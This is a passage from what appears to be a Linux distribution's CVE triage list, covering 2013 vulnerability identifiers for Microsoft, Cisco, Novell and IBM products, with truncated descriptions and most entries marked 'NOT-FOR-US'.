	NOT-FOR-US: Microsoft SharePoint
CVE-2013-1329 (Integer signedness error in Microsoft Publisher 2003 SP3 allows remote ...)
	NOT-FOR-US: Microsoft Publisher
CVE-2013-1328 (Microsoft Publisher 2003 SP3, 2007 SP3, and 2010 SP1 allows remote att ...)
	NOT-FOR-US: Microsoft Publisher
CVE-2013-1327 (Integer signedness error in Microsoft Publisher 2003 SP3 allows remote ...)
	NOT-FOR-US: Microsoft Publisher
CVE-2013-1326 REJECTED
CVE-2013-1325 (Heap-based buffer overflow in Microsoft Office 2003 SP3 and 2007 SP3 a ...)
	NOT-FOR-US: Microsoft
CVE-2013-1324 (Stack-based buffer overflow in Microsoft Office 2003 SP3, 2007 SP3, 20 ...)
	NOT-FOR-US: Microsoft
CVE-2013-1323 (Microsoft Publisher 2003 SP3 does not properly handle NULL values for ...)
	NOT-FOR-US: Microsoft Publisher
CVE-2013-1322 (Microsoft Publisher 2003 SP3 does not properly check table range data, ...)
	NOT-FOR-US: Microsoft Publisher
CVE-2013-1321 (Microsoft Publisher 2003 SP3 does not properly check the data type of ...)
	NOT-FOR-US: Microsoft Publisher
CVE-2013-1320 (Buffer overflow in Microsoft Publisher 2003 SP3 allows remote attacker ...)
	NOT-FOR-US: Microsoft Publisher
CVE-2013-1319 (Microsoft Publisher 2003 SP3 does not properly check the return value ...)
	NOT-FOR-US: Microsoft Publisher
CVE-2013-1318 (Microsoft Publisher 2003 SP3 allows remote attackers to execute arbitr ...)
	NOT-FOR-US: Microsoft Publisher
CVE-2013-1317 (Integer overflow in Microsoft Publisher 2003 SP3 allows remote attacke ...)
	NOT-FOR-US: Microsoft Publisher
CVE-2013-1316 (Microsoft Publisher 2003 SP3 does not properly validate the size of an ...)
NOT-FOR-US: Microsoft Publisher
CVE-2013-1315 (Microsoft SharePoint Server 2007 SP3, 2010 SP1 and SP2, and 2013; Offi ...)
	NOT-FOR-US: Microsoft
CVE-2013-1314 REJECTED
CVE-2013-1313 (Object Linking and Embedding (OLE) Automation in Microsoft Windows XP ...)
	NOT-FOR-US: Microsoft Windows XP
CVE-2013-1312 (Use-after-free vulnerability in Microsoft Internet Explorer 9 and 10 a ...)
	NOT-FOR-US: Microsoft Internet Explorer
CVE-2013-1311 (Use-after-free vulnerability in Microsoft Internet Explorer 8 allows r ...)
	NOT-FOR-US: Microsoft Internet Explorer
CVE-2013-1310 (Use-after-free vulnerability in Microsoft Internet Explorer 6 and 7 al ...)
	NOT-FOR-US: Microsoft Internet Explorer
CVE-2013-1309 (Use-after-free vulnerability in Microsoft Internet Explorer 6 through ...)
	NOT-FOR-US: Microsoft Internet Explorer
CVE-2013-1308 (Use-after-free vulnerability in Microsoft Internet Explorer 6 through ...)
	NOT-FOR-US: Microsoft Internet Explorer
CVE-2013-1307 (Use-after-free vulnerability in Microsoft Internet Explorer 8 and 9 al ...)
	NOT-FOR-US: Microsoft Internet Explorer
CVE-2013-1306 (Use-after-free vulnerability in Microsoft Internet Explorer 9 allows r ...)
	NOT-FOR-US: Microsoft Internet Explorer
CVE-2013-1305 (HTTP.sys in Microsoft Windows 8, Windows Server 2012, and Windows RT a ...)
	NOT-FOR-US: Microsoft
CVE-2013-1304 (Use-after-free vulnerability in Microsoft Internet Explorer 6 through ...)
	NOT-FOR-US: Microsoft Internet Explorer
CVE-2013-1303 (Use-after-free vulnerability in Microsoft Internet Explorer 6 through ...)
	NOT-FOR-US: Microsoft Internet Explorer
CVE-2013-1302 (Microsoft Communicator 2007 R2, Lync 2010, Lync 2010 Attendee, and Lyn ...)
	NOT-FOR-US: Microsoft
CVE-2013-1301 (Microsoft Visio 2003 SP3 2007 SP3, and 2010 SP1 allows remote attacker ...)
	NOT-FOR-US: Microsoft Visio
CVE-2013-1300 (win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and ...)
NOT-FOR-US: Microsoft
CVE-2013-1299 (Microsoft Windows Modern Mail allows remote attackers to spoof link ta ...)
	NOT-FOR-US: Microsoft Windows Modern Mail
CVE-2013-1298 REJECTED
CVE-2013-1297 (Microsoft Internet Explorer 6 through 8 does not properly restrict dat ...)
	NOT-FOR-US: Microsoft Internet Explorer
CVE-2013-1296 (The Remote Desktop ActiveX control in mstscax.dll in Microsoft Remote ...)
	NOT-FOR-US: Microsoft Remote Desktop Connection Client
CVE-2013-1295 (The Client/Server Run-time Subsystem (CSRSS) in Microsoft Windows XP S ...)
	NOT-FOR-US: Microsoft Windows
CVE-2013-1294 (Race condition in the kernel in Microsoft Windows XP SP2 and SP3, Wind ...)
	NOT-FOR-US: Microsoft Windows
CVE-2013-1293 (The NTFS kernel-mode driver in Microsoft Windows Vista SP2, Windows Se ...)
	NOT-FOR-US: Microsoft Windows
CVE-2013-1292 (Race condition in win32k.sys in the kernel-mode drivers in Microsoft W ...)
	NOT-FOR-US: Microsoft Windows
CVE-2013-1291 (win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP3, Win ...)
	NOT-FOR-US: Microsoft Windows
CVE-2013-1290 (Microsoft SharePoint Server 2013, in certain configurations involving ...)
	NOT-FOR-US: Microsoft SharePoint Server
CVE-2013-1289 (Cross-site scripting (XSS) vulnerability in Microsoft SharePoint Serve ...)
	NOT-FOR-US: Microsoft SharePoint Server
CVE-2013-1288 (Use-after-free vulnerability in Microsoft Internet Explorer 8 allows r ...)
	NOT-FOR-US: Microsoft Internet Explorer
CVE-2013-1287 (The USB kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windo ...)
	NOT-FOR-US: Microsoft Windows
CVE-2013-1286 (The USB kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windo ...)
	NOT-FOR-US: Microsoft Windows
CVE-2013-1285 (The USB kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windo ...)
	NOT-FOR-US: Microsoft Windows
CVE-2013-1284 (Race condition in the kernel in Microsoft Windows 8, Windows Server 20 ...)
NOT-FOR-US: Microsoft Windows
CVE-2013-1283 (Race condition in win32k.sys in the kernel-mode drivers in Microsoft W ...)
	NOT-FOR-US: Microsoft Windows
CVE-2013-1282 (The LDAP service in Microsoft Active Directory, Active Directory Appli ...)
	NOT-FOR-US: Microsoft
CVE-2013-1281 (The NFS server in Microsoft Windows Server 2008 R2 and R2 SP1 and Serv ...)
	NOT-FOR-US: Microsoft Windows
CVE-2013-1280 (The kernel in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP ...)
	NOT-FOR-US: Microsoft Windows
CVE-2013-1279 (Race condition in the kernel in Microsoft Windows XP SP2 and SP3, Wind ...)
	NOT-FOR-US: Microsoft Windows
CVE-2013-1278 (Race condition in the kernel in Microsoft Windows XP SP2 and SP3, Wind ...)
	NOT-FOR-US: Microsoft Windows
CVE-2013-1277 (Race condition in win32k.sys in the kernel-mode drivers in Microsoft W ...)
	NOT-FOR-US: Microsoft Windows
CVE-2013-1276 (Race condition in win32k.sys in the kernel-mode drivers in Microsoft W ...)
	NOT-FOR-US: Microsoft Windows
CVE-2013-1275 (Race condition in win32k.sys in the kernel-mode drivers in Microsoft W ...)
	NOT-FOR-US: Microsoft Windows
CVE-2013-1274 (Race condition in win32k.sys in the kernel-mode drivers in Microsoft W ...)
	NOT-FOR-US: Microsoft Windows
CVE-2013-1273 (Race condition in win32k.sys in the kernel-mode drivers in Microsoft W ...)
	NOT-FOR-US: Microsoft Windows
CVE-2013-1272 (Race condition in win32k.sys in the kernel-mode drivers in Microsoft W ...)
	NOT-FOR-US: Microsoft Windows
CVE-2013-1271 (Race condition in win32k.sys in the kernel-mode drivers in Microsoft W ...)
	NOT-FOR-US: Microsoft Windows
CVE-2013-1270 (Race condition in win32k.sys in the kernel-mode drivers in Microsoft W ...)
	NOT-FOR-US: Microsoft Windows
CVE-2013-1269 (Race condition in win32k.sys in the kernel-mode drivers in Microsoft W ...)
	NOT-FOR-US: Microsoft Windows
CVE-2013-1268 (Race condition in win32k.sys in the kernel-mode drivers in Microsoft W ...)
NOT-FOR-US: Microsoft Windows
CVE-2013-1267 (Race condition in win32k.sys in the kernel-mode drivers in Microsoft W ...)
	NOT-FOR-US: Microsoft Windows
CVE-2013-1266 (Race condition in win32k.sys in the kernel-mode drivers in Microsoft W ...)
	NOT-FOR-US: Microsoft Windows
CVE-2013-1265 (Race condition in win32k.sys in the kernel-mode drivers in Microsoft W ...)
	NOT-FOR-US: Microsoft Windows
CVE-2013-1264 (Race condition in win32k.sys in the kernel-mode drivers in Microsoft W ...)
	NOT-FOR-US: Microsoft Windows
CVE-2013-1263 (Race condition in win32k.sys in the kernel-mode drivers in Microsoft W ...)
	NOT-FOR-US: Microsoft Windows
CVE-2013-1262 (Race condition in win32k.sys in the kernel-mode drivers in Microsoft W ...)
	NOT-FOR-US: Microsoft Windows
CVE-2013-1261 (Race condition in win32k.sys in the kernel-mode drivers in Microsoft W ...)
	NOT-FOR-US: Microsoft Windows
CVE-2013-1260 (Race condition in win32k.sys in the kernel-mode drivers in Microsoft W ...)
	NOT-FOR-US: Microsoft Windows
CVE-2013-1259 (Race condition in win32k.sys in the kernel-mode drivers in Microsoft W ...)
	NOT-FOR-US: Microsoft Windows
CVE-2013-1258 (Race condition in win32k.sys in the kernel-mode drivers in Microsoft W ...)
	NOT-FOR-US: Microsoft Windows
CVE-2013-1257 (Race condition in win32k.sys in the kernel-mode drivers in Microsoft W ...)
	NOT-FOR-US: Microsoft Windows
CVE-2013-1256 (Race condition in win32k.sys in the kernel-mode drivers in Microsoft W ...)
	NOT-FOR-US: Microsoft Windows
CVE-2013-1255 (Race condition in win32k.sys in the kernel-mode drivers in Microsoft W ...)
	NOT-FOR-US: Microsoft Windows
CVE-2013-1254 (Race condition in win32k.sys in the kernel-mode drivers in Microsoft W ...)
	NOT-FOR-US: Microsoft Windows
CVE-2013-1253 (Race condition in win32k.sys in the kernel-mode drivers in Microsoft W ...)
	NOT-FOR-US: Microsoft Windows
CVE-2013-1252 (Race condition in win32k.sys in the kernel-mode drivers in Microsoft W ...)
NOT-FOR-US: Microsoft Windows
CVE-2013-1251 (Race condition in win32k.sys in the kernel-mode drivers in Microsoft W ...)
	NOT-FOR-US: Microsoft Windows
CVE-2013-1250 (Race condition in win32k.sys in the kernel-mode drivers in Microsoft W ...)
	NOT-FOR-US: Microsoft Windows
CVE-2013-1249 (Race condition in win32k.sys in the kernel-mode drivers in Microsoft W ...)
	NOT-FOR-US: Microsoft Windows
CVE-2013-1248 (Race condition in win32k.sys in the kernel-mode drivers in Microsoft W ...)
	NOT-FOR-US: Microsoft Windows
CVE-2013-1247 (Cross-site scripting (XSS) vulnerability in the wireless configuration ...)
	NOT-FOR-US: Cisco
CVE-2013-1246 (Cisco TelePresence System Software does not properly handle inactive t ...)
	NOT-FOR-US: Cisco
CVE-2013-1245 (The user-management page in Cisco WebEx Social relies on client-side v ...)
	NOT-FOR-US: Cisco WebEx Social
CVE-2013-1244 (Cross-site scripting (XSS) vulnerability in the portal module in Cisco ...)
	NOT-FOR-US: Cisco WebEx Social
CVE-2013-1243 (The IP stack in Cisco Intrusion Prevention System (IPS) Software in AS ...)
	NOT-FOR-US: Cisco
CVE-2013-1242 (Memory leak in the web framework in the server in Cisco Unified Presen ...)
	NOT-FOR-US: Cisco
CVE-2013-1241 (The ISM module in Cisco IOS on ISR G2 routers does not properly handle ...)
	NOT-FOR-US: Cisco IOS
CVE-2013-1240 (The command-line interface in Cisco Unified Communications Manager (CU ...)
	NOT-FOR-US: Cisco Unified Communications Manager
CVE-2013-1239 RESERVED
CVE-2013-1238 RESERVED
CVE-2013-1237 RESERVED
CVE-2013-1236 (Cisco TelePresence Supervisor MSE 8050 before 2.3(1.31) allows remote ...)
	NOT-FOR-US: Cisco TelePresence Supervisor
CVE-2013-1235 (Cisco Wireless LAN Controller (WLC) devices do not properly address th ...)
	NOT-FOR-US: Cisco Wireless LAN Controller
CVE-2013-1234 (The SNMP module in Cisco IOS XR allows remote authenticated users to c ...)
NOT-FOR-US: Cisco IOS XR
CVE-2013-1233 REJECTED
CVE-2013-1232 (The HTTP implementation in Cisco WebEx Node for MCS, WebEx Meetings Se ...)
	NOT-FOR-US: Cisco WebEx
CVE-2013-1231 (The HTTP implementation in Cisco WebEx Node for MCS and WebEx Meetings ...)
	NOT-FOR-US: Cisco WebEx
CVE-2013-1230 (Cisco Unified Communications Domain Manager allows remote attackers to ...)
	NOT-FOR-US: Cisco
CVE-2013-1229 (TMSSNMPService.exe in TelePresence Manager in Cisco TelePresence Manag ...)
	NOT-FOR-US: Cisco
CVE-2013-1228 (Cisco Jabber on Windows does not verify X.509 certificates from SSL se ...)
	NOT-FOR-US: Cisco Jabber
CVE-2013-1227 (Cross-site scripting (XSS) vulnerability in the web framework in Cisco ...)
	NOT-FOR-US: Cisco Unified Communications Domain Manager
CVE-2013-1226 (The Ethernet frame-forwarding implementation in Cisco NX-OS on Nexus 7 ...)
	NOT-FOR-US: Cisco NX-OS
CVE-2013-1225 (Cisco Unified Customer Voice Portal (CVP) Software before 9.0.1 ES 11 ...)
	NOT-FOR-US: Cisco Unified Customer Voice Portal
CVE-2013-1224 (Directory traversal vulnerability in the Resource Manager in Cisco Uni ...)
	NOT-FOR-US: Cisco Unified Customer Voice Portal
CVE-2013-1223 (The log viewer in Cisco Unified Customer Voice Portal (CVP) Software b ...)
	NOT-FOR-US: Cisco Unified Customer Voice Portal
CVE-2013-1222 (The Tomcat Web Management feature in Cisco Unified Customer Voice Port ...)
	NOT-FOR-US: Cisco Unified Customer Voice Portal
CVE-2013-1221 (The Tomcat Web Management feature in Cisco Unified Customer Voice Port ...)
	NOT-FOR-US: Cisco Unified Customer Voice Portal
CVE-2013-1220 (The CallServer component in Cisco Unified Customer Voice Portal (CVP) ...)
	NOT-FOR-US: Cisco Unified Customer Voice Portal
CVE-2013-1219 (SensorApp in Cisco Intrusion Prevention System (IPS) allows local user ...)
	NOT-FOR-US: Cisco Intrusion Prevention System
CVE-2013-1218 (Cisco Intrusion Prevention System (IPS) Software in ASA 5500-X IPS-SSP ...)
NOT-FOR-US: Cisco
CVE-2013-1217 (The generic input/output control implementation in Cisco IOS does not ...)
	NOT-FOR-US: Cisco IOS
CVE-2013-1216 (Memory leak in the SNMP module in Cisco IOS XR allows remote authentic ...)
	NOT-FOR-US: Cisco IOS XR
CVE-2013-1215 (The vpnclient program in the Easy VPN component on Cisco Adaptive Secu ...)
	NOT-FOR-US: Cisco
CVE-2013-1214 (The scripts editor in Cisco Unified Contact Center Express (aka Unifie ...)
	NOT-FOR-US: Cisco Unified Contact Center Express
CVE-2013-1213 (Cisco NX-OS on the Nexus 1000V does not assign the proper priority to ...)
	NOT-FOR-US: Cisco
CVE-2013-1212 (The SSL functionality in Cisco NX-OS on the Nexus 1000V does not prope ...)
	NOT-FOR-US: Cisco
CVE-2013-1211 (Cisco NX-OS on the Nexus 1000V does not properly handle authentication ...)
	NOT-FOR-US: Cisco
CVE-2013-1210 (Array index error in the Virtual Ethernet Module (VEM) kernel driver f ...)
	NOT-FOR-US: Cisco
CVE-2013-1209 (The encryption functionality in the Virtual Supervisor Module (VSM) to ...)
	NOT-FOR-US: Cisco
CVE-2013-1208 (The encryption functionality in Cisco NX-OS on the Nexus 1000V does no ...)
	NOT-FOR-US: Cisco
CVE-2013-1207 RESERVED
CVE-2013-1206 RESERVED
CVE-2013-1205 (The Event Center module in Cisco WebEx Meetings Server does not perfor ...)
	NOT-FOR-US: Cisco WebEx Meetings Server
CVE-2013-1204 (Memory leak in the SNMP process in Cisco IOS XR allows remote attacker ...)
	NOT-FOR-US: Cisco IOS XR
CVE-2013-1203 (Cisco ASA CX Context-Aware Security Software allows remote attackers t ...)
	NOT-FOR-US: Cisco ASA
CVE-2013-1202 (Cisco ACE A2(3.6) allows log retention DoS. ...)
	NOT-FOR-US: Cisco
CVE-2013-1201 RESERVED
CVE-2013-1200 (Session fixation vulnerability in Cisco Secure Access Control System ( ...)
	NOT-FOR-US: Cisco Secure Access Control System
CVE-2013-1199 (Race condition in the CIFS implementation in the rewriter module in th ...)
	NOT-FOR-US: Cisco
CVE-2013-1198 (Cross-site scripting (XSS) vulnerability in a Flash component in Cisco ...)
NOT-FOR-US: Cisco Unified Computing System
CVE-2013-1197 (The XML parser in the server in Cisco Unified Presence (CUP) allows re ...)
	NOT-FOR-US: Cisco Unified Presence
CVE-2013-1196 (The command-line interface in Cisco Secure Access Control System (ACS) ...)
	NOT-FOR-US: Cisco
CVE-2013-1195 (The time-based ACL implementation on Cisco Adaptive Security Appliance ...)
	NOT-FOR-US: Cisco Adaptive Security Appliances
CVE-2013-1194 (The ISAKMP implementation on Cisco Adaptive Security Appliances (ASA) ...)
	NOT-FOR-US: Cisco
CVE-2013-1193 (The Secure Shell (SSH) implementation on Cisco Adaptive Security Appli ...)
	NOT-FOR-US: Cisco
CVE-2013-1192 (The JAR files on Cisco Device Manager for Cisco MDS 9000 devices befor ...)
	NOT-FOR-US: Cisco Device Manager
CVE-2013-1191 (Cisco NX-OS 6.1 before 6.1(5) on Nexus 7000 devices, when local authen ...)
	NOT-FOR-US: Cisco
CVE-2013-1190 (The C-Series Rack Server component 1.4 in Cisco Unified Computing Syst ...)
	NOT-FOR-US: Cisco
CVE-2013-1189 (Cisco Universal Broadband (aka uBR) 10000 series routers, when an IPv4 ...)
	NOT-FOR-US: Cisco Universal Broadband 10000 series routers
CVE-2013-1188 (Cisco Unified Communications Manager (CUCM) does not properly limit th ...)
	NOT-FOR-US: Cisco Unified Communications Manager
CVE-2013-1187 (The Connection Manager in Cisco Jabber Extensible Communications Platf ...)
	NOT-FOR-US: Cisco
CVE-2013-1186 (Cisco Unified Computing System (UCS) 1.x before 1.4(4) and 2.x before ...)
	NOT-FOR-US: Cisco Unified Computing System
CVE-2013-1185 (The web interface in the Manager component in Cisco Unified Computing ...)
	NOT-FOR-US: Cisco Unified Computing System
CVE-2013-1184 (The management API in the XML API management service in the Manager co ...)
	NOT-FOR-US: Cisco Unified Computing System
CVE-2013-1183 (Buffer overflow in the Intelligent Platform Management Interface (IPMI ...)
	NOT-FOR-US: Cisco Unified Computing System
CVE-2013-1182 (The login page in the Web Console in the Manager component in Cisco Un ...)
NOT-FOR-US: Cisco Unified Computing System
CVE-2013-1181 (Cisco NX-OS on Nexus 5500 devices 4.x and 5.x before 5.0(3)N2(2), Nexu ...)
	NOT-FOR-US: Cisco
CVE-2013-1180 (Buffer overflow in the SNMP implementation in Cisco NX-OS on Nexus 700 ...)
	NOT-FOR-US: Cisco NX-OS
CVE-2013-1179 (Multiple buffer overflows in the (1) SNMP and (2) License Manager impl ...)
	NOT-FOR-US: Cisco NX-OS
CVE-2013-1178 (Multiple buffer overflows in the Cisco Discovery Protocol (CDP) implem ...)
	NOT-FOR-US: Cisco NX-OS
CVE-2013-1177 (SQL injection vulnerability in Cisco Network Admission Control (NAC) M ...)
	NOT-FOR-US: Cisco Network Admission Control Manager
CVE-2013-1176 (The DSP card on Cisco TelePresence MCU 4500 and 4501 devices before 4. ...)
	NOT-FOR-US: Cisco
CVE-2013-1175 REJECTED
CVE-2013-1174 (Cisco Tivoli Business Service Manager (TBSM) in Hosted Collaboration M ...)
	NOT-FOR-US: Cisco Tivoli Business Service Manager
CVE-2013-1173 (Heap-based buffer overflow in ciscod.exe in the Cisco Security Service ...)
	NOT-FOR-US: Cisco AnyConnect
CVE-2013-1172 (The Cisco Security Service in Cisco AnyConnect Secure Mobility Client ...)
	NOT-FOR-US: Cisco AnyConnect
CVE-2013-1171 (Multiple cross-site scripting (XSS) vulnerabilities in the element-lis ...)
	NOT-FOR-US: Cisco Connected Grid Network Management System (CG-NMS)
CVE-2013-1170 (The Cisco Prime Network Control System (NCS) appliance with software b ...)
	NOT-FOR-US: Cisco Prime Network Control System
CVE-2013-1169 (Cisco Unified MeetingPlace Web Conferencing Server 7.x before 7.1MR1 P ...)
	NOT-FOR-US: Cisco Unified MeetingPlace Web Conferencing Server
CVE-2013-1168 (The web server in Cisco Unified MeetingPlace Application Server 7.x be ...)
	NOT-FOR-US: Cisco Unified MeetingPlace Application Server
CVE-2013-1167 (Cisco IOS XE 3.2 through 3.4 before 3.4.2S, and 3.5, on 1000 series Ag ...)
	NOT-FOR-US: Cisco IOS XE
CVE-2013-1166 (Cisco IOS XE 3.2 through 3.4 before 3.4.5S, and 3.5 through 3.7 before ...)
NOT-FOR-US: Cisco IOS XE
CVE-2013-1165 (Cisco IOS XE 2.x and 3.x before 3.4.5S, and 3.5 through 3.7 before 3.7 ...)
	NOT-FOR-US: Cisco IOS XE
CVE-2013-1164 (Cisco IOS XE 3.4 before 3.4.4S, 3.5, and 3.6 on 1000 series Aggregatio ...)
	NOT-FOR-US: Cisco IOS XE
CVE-2013-1163 (Multiple SQL injection vulnerabilities in the device-management implem ...)
	NOT-FOR-US: Cisco
CVE-2013-1162 (The traffic engineering (TE) processing subsystem in Cisco IOS XR allo ...)
	NOT-FOR-US: Cisco
CVE-2013-1161 (The XML parser in the Cisco Jabber IM application for Android allows r ...)
	NOT-FOR-US: Cisco
CVE-2013-1160 (Cross-site scripting (XSS) vulnerability in the OpenView web menus in ...)
	NOT-FOR-US: Cisco
CVE-2013-1159 (Cross-site scripting (XSS) vulnerability in the Netcool Impact (NCI) w ...)
	NOT-FOR-US: Cisco
CVE-2013-1158 (Cross-site scripting (XSS) vulnerability in the IBM Tivoli Monitoring ...)
	NOT-FOR-US: IBM
CVE-2013-1157 (Cross-site scripting (XSS) vulnerability in the IBM Tivoli Monitoring ...)
	NOT-FOR-US: IBM
CVE-2013-1156 (Directory traversal vulnerability in Cisco Prime Central for Hosted Co ...)
	NOT-FOR-US: Cisco
CVE-2013-1155 (The auth-proxy functionality in Cisco Firewall Services Module (FWSM) ...)
	NOT-FOR-US: Cisco Firewall Services Module
CVE-2013-1154 (The Cisco Small Business 200 Series Smart Switch 1.2.7.76 and earlier, ...)
	NOT-FOR-US: Cisco Small Business switches
CVE-2013-1153 (Cross-site request forgery (CSRF) vulnerability in the web interface i ...)
	NOT-FOR-US: Cisco Prime Infrastructure
CVE-2013-1152 (Cisco Adaptive Security Appliances (ASA) devices with software 9.0 bef ...)
	NOT-FOR-US: Cisco Adaptive Security Appliances
CVE-2013-1151 (Cisco Adaptive Security Appliances (ASA) devices with software 7.x bef ...)
	NOT-FOR-US: Cisco Adaptive Security Appliances
CVE-2013-1150 (The authentication-proxy implementation on Cisco Adaptive Security App ...)
NOT-FOR-US: Cisco Adaptive Security Appliances
CVE-2013-1149 (Cisco Adaptive Security Appliances (ASA) devices with software 7.x bef ...)
	NOT-FOR-US: Cisco Adaptive Security Appliances
CVE-2013-1148 (The General Responder implementation in the IP Service Level Agreement ...)
	NOT-FOR-US: Cisco IOS
CVE-2013-1147 (The Protocol Translation (PT) functionality in Cisco IOS 12.3 through ...)
	NOT-FOR-US: Cisco IOS
CVE-2013-1146 (The Smart Install client functionality in Cisco IOS 12.2 and 15.0 thro ...)
	NOT-FOR-US: Cisco IOS
CVE-2013-1145 (Memory leak in Cisco IOS 12.2, 12.4, 15.0, and 15.1, when Zone-Based P ...)
	NOT-FOR-US: Cisco IOS
CVE-2013-1144 (Memory leak in the IKEv1 implementation in Cisco IOS 15.1 allows remot ...)
	NOT-FOR-US: Cisco IOS
CVE-2013-1143 (The RSVP protocol implementation in Cisco IOS 12.2 and 15.0 through 15 ...)
	NOT-FOR-US: Cisco IOS
CVE-2013-1142 (Race condition in the VRF-aware NAT feature in Cisco IOS 12.2 through ...)
	NOT-FOR-US: Cisco IOS
CVE-2013-1141 (The mDNS snooping functionality on Cisco Wireless LAN Controller (WLC) ...)
	NOT-FOR-US: Cisco Wireless LAN Controller
CVE-2013-1140 (The XML parser in Cisco Security Monitoring, Analysis, and Response Sy ...)
	NOT-FOR-US: Cisco Security MARS
CVE-2013-1139 (The nsAPI interface in Cisco Cloud Portal 9.1 SP1 and SP2, and 9.3 thr ...)
	NOT-FOR-US: Cisco Cloud Portal
CVE-2013-1138 (The NAT process on Cisco Adaptive Security Appliances (ASA) devices al ...)
	NOT-FOR-US: Cisco
CVE-2013-1137 (Cisco Unified Presence Server (CUPS) 8.6, 9.0, and 9.1 before 9.1.1 al ...)
	NOT-FOR-US: Cisco Unified Presence Server
CVE-2013-1136 (The crypto engine process in Cisco IOS on Aggregation Services Router ...)
	NOT-FOR-US: Cisco IOS
CVE-2013-1135 (Cisco Prime Central for Hosted Collaboration Solution (HCS) Assurance ...)
	NOT-FOR-US: Cisco Prime Central
CVE-2013-1134 (The Location Bandwidth Manager (LBM) Intracluster-communication featur ...)
NOT-FOR-US: Cisco Unified Communications Manager
CVE-2013-1133 (Cisco Unified Communications Manager (CUCM) 8.6 before 8.6(2a)su2, 8.6 ...)
	NOT-FOR-US: Cisco Unified Communications Manager
CVE-2013-1132 (Multiple cross-site scripting (XSS) vulnerabilities in Cisco Unified C ...)
	NOT-FOR-US: Cisco
CVE-2013-1131 (Cisco Small Business Wireless Access Points WAP200, WAP2000, WAP200E, ...)
	NOT-FOR-US: Cisco Small Business Wireless Access Points
CVE-2013-1130 (Cisco AnyConnect Secure Mobility Client on Mac OS X uses weak permissi ...)
	NOT-FOR-US: Cisco
CVE-2013-1129 (Memory leak in Cisco Unity Connection 9.x allows remote attackers to c ...)
	NOT-FOR-US: Cisco
CVE-2013-1128 (Multiple cross-site request forgery (CSRF) vulnerabilities in the serv ...)
	NOT-FOR-US: Cisco Unified MeetingPlace
CVE-2013-1127 RESERVED
CVE-2013-1126 RESERVED
CVE-2013-1125 (The command-line interface in Cisco Identity Services Engine Software, ...)
	NOT-FOR-US: Cisco
CVE-2013-1124 (The Cisco Network Admission Control (NAC) agent on Mac OS X does not v ...)
	NOT-FOR-US: Cisco Network Admission Control
CVE-2013-1123 (Multiple cross-site scripting (XSS) vulnerabilities in the server in C ...)
	NOT-FOR-US: Cisco Unified MeetingPlace
CVE-2013-1122 (Cisco NX-OS on the Nexus 7000, when a certain Overlay Transport Virtua ...)
	NOT-FOR-US: Cisco NX-OS
CVE-2013-1121 (The regex engine in the BGP implementation in Cisco NX-OS, when a comp ...)
	NOT-FOR-US: Cisco NX-OS
CVE-2013-1120 (Multiple cross-site request forgery (CSRF) vulnerabilities on the Cisc ...)
	NOT-FOR-US: Cisco Unity Express
CVE-2013-1119 (Buffer overflow in Cisco WebEx Recording Format (WRF) player T27 LD be ...)
	NOT-FOR-US: Cisco WebEx
CVE-2013-1118 (Stack-based buffer overflow in Cisco WebEx Recording Format (WRF) play ...)
	NOT-FOR-US: Cisco WebEx
CVE-2013-1117 (Buffer overflow in the exception handler in Cisco WebEx Recording Form ...)
	NOT-FOR-US: Cisco WebEx
CVE-2013-1116 (Buffer overflow in Cisco WebEx Advanced Recording Format (ARF) player ...)
NOT-FOR-US: Cisco WebEx
CVE-2013-1115 (Buffer overflow in Cisco WebEx Advanced Recording Format (ARF) player ...)
	NOT-FOR-US: Cisco WebEx
CVE-2013-1114 (Multiple cross-site scripting (XSS) vulnerabilities in Cisco Unity Exp ...)
	NOT-FOR-US: Cisco Unity Express
CVE-2013-1113 (Cross-site scripting (XSS) vulnerability in Cisco Unified Communicatio ...)
	NOT-FOR-US: Cisco Unified Communications Domain Manager
CVE-2013-1112 (Cisco Carrier Routing System (CRS) allows remote attackers to cause a ...)
	NOT-FOR-US: Cisco Carrier Routing System
CVE-2013-1111 (The Cisco ATA 187 Analog Telephone Adaptor with firmware 9.2.1.0 and 9 ...)
	NOT-FOR-US: Cisco ATA 187 Analog Telephone Adaptor
CVE-2013-1110 (Cisco WebEx Training Center allow remote authenticated users to bypass ...)
	NOT-FOR-US: Cisco WebEx Training Center
CVE-2013-1109 (Cross-site request forgery (CSRF) vulnerability in testingLibraryActio ...)
	NOT-FOR-US: Cisco WebEx Training Center
CVE-2013-1108 (Cisco WebEx Training Center allows remote authenticated users to remov ...)
	NOT-FOR-US: Cisco WebEx Training Center
CVE-2013-1107 (The search function in Cisco Webex Social (formerly Cisco Quad) allows ...)
	NOT-FOR-US: Cisco Webex Social
CVE-2013-1106 RESERVED
CVE-2013-1105 (Cisco Wireless LAN Controller (WLC) devices with software 7.0 before 7 ...)
	NOT-FOR-US: Cisco Wireless LAN Controller
CVE-2013-1104 (The HTTP Profiling functionality on Cisco Wireless LAN Controller (WLC ...)
	NOT-FOR-US: Cisco Wireless LAN Controller
CVE-2013-1103 (Cisco Wireless LAN Controller (WLC) devices with software 7.0 before 7 ...)
	NOT-FOR-US: Cisco Wireless LAN Controller
CVE-2013-1102 (The Wireless Intrusion Prevention System (wIPS) component on Cisco Wir ...)
	NOT-FOR-US: Cisco Wireless LAN Controller
CVE-2013-1101 RESERVED
CVE-2013-1100 (The HTTP server in Cisco IOS on Catalyst switches does not properly ha ...)
NOT-FOR-US: Cisco IOS
CVE-2013-1099 REJECTED
CVE-2013-1098 RESERVED
CVE-2013-1097 (Cross-site scripting (XSS) vulnerability in a ZCC page in njwc.jar in ...)
	NOT-FOR-US: Novell ZENworks Configuration Management
CVE-2013-1096 (Cross-site scripting (XSS) vulnerability in the Roles Based Provisioni ...)
	NOT-FOR-US: Novell Identity Manager
CVE-2013-1095 (Cross-site scripting (XSS) vulnerability in a ZCC page in njwc.jar in ...)
	NOT-FOR-US: Novell ZENworks Configuration Management
CVE-2013-1094 (Cross-site scripting (XSS) vulnerability in a ZCC page in zenworks-cor ...)
	NOT-FOR-US: Novell ZENworks Configuration Management
CVE-2013-1093 (Open redirect vulnerability in the fwdToURL function in the ZCC login ...)
	NOT-FOR-US: Novell ZENworks Configuration Management
CVE-2013-1092 (Multiple unquoted Windows search path vulnerabilities in Novell ZENwor ...)
	NOT-FOR-US: Novell ZENworks Desktop Management
